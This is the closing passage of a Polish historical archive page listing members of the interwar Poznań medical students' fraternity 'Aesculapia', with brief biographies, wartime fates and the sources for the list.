 72. Władysław ? Twardosz, (10 stycznia 1909 w Mar. Hory w Czechach - ) student i absolwent 1936 med. UP, dr med. UP 1947, chirurg, urolog, w 1956 adiunkt w Klinice Chirurgii AM w Poznaniu
 73. Zygmunt Tyborowski, (2 maja 1909 w Warszawie - 1940 w Charkowie) student i absolwent med. UP, prezes MNR 1937, absolwent Sanitarnej Szkoły Podchorążych Rezerwy w Warszawie, ppor. rez., w wojnie obronnej 1939 w 68 Pułku Piechoty Strzelców Wielkopolskich, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD
 74. Stanisław Tyczkowski,
 75. Piotr Tymosiewicz, (4 grudnia 1905 w Cichostowie - 1989) student i absolwent 1946 med. UP, sekretarz sem. let. 1931/32, wiceprezes 1932/33, dr med. 1946 UP, internista, po wojnie lekarz w Trzebini
 76. Tadeusz Wasilewski, (2 stycznia 1906 w Stadnicy pow. Humań) student i absolwent 1931 med. UP, habilitacja UWr. 1947, w 1956 prof. i kierownik Zakładu Anatomii Praw. AM w Łodzi

  Alfons Wawrzyniak, ok. 2005 r.

 77. Alfons Wawrzyniak, (22 listopada 1914 w miejsc. Mroczeń - 2007) s. Stanisława i Władysława z d. Deplewskiej, sekretarz sem. zim. 1936/37, żołnierz II Korpusu PSZ na Zachodzie 1942-46, m.in. na Bliskim Wschodzie i we Włoszech, kpt., wrócił do kraju, odznaczony Krzyżem Walecznych, Srebrnym Krzyżem Zasługi z Mieczami, Krzyżem Monte Cassino, brytyjskimi 1939-45 Star, Italy Star, Defence Medal

 78. Edmund Zaporowski, (26 października 1909 w Obornikach Wlkp. - ) student i absolwent 1936 med. UP, sekretarz 1933, wiceprezes sem. zim. 1933/34, ginekolog i położnik, w 1956 dyrektor Szpitala Miejskiego w Świdnicy
 79. Wacław Ziętek,

Pieczęć Aesculapii, 1938 r.

Listę członków opracowano na podstawie:

1) K. A. Tyszka, Lista członków Polskiej Korporacji Akademickiej Aesculapia (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 125 i n.,
2) Sprawozdanie Prezydjum Korporacji Aesculapia za czasokres kadencji od 27 października 31 roku do 20 czerwca 1932 roku, maszynopis, Archiwum Korporacyjne,
3) danych encyklopedycznych i słownikowych oraz rozmów z rodzinami zmarłych członków Aesculapii.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2009 r.
Ostatnia zmiana: 2 IV 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Akademicka Korporacja Medyków Uniwersytetu Poznańskiego „Aesculapia” w Poznaniu, (na:) www.archiwumkorporacyjne.pl, stan 2 IV 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }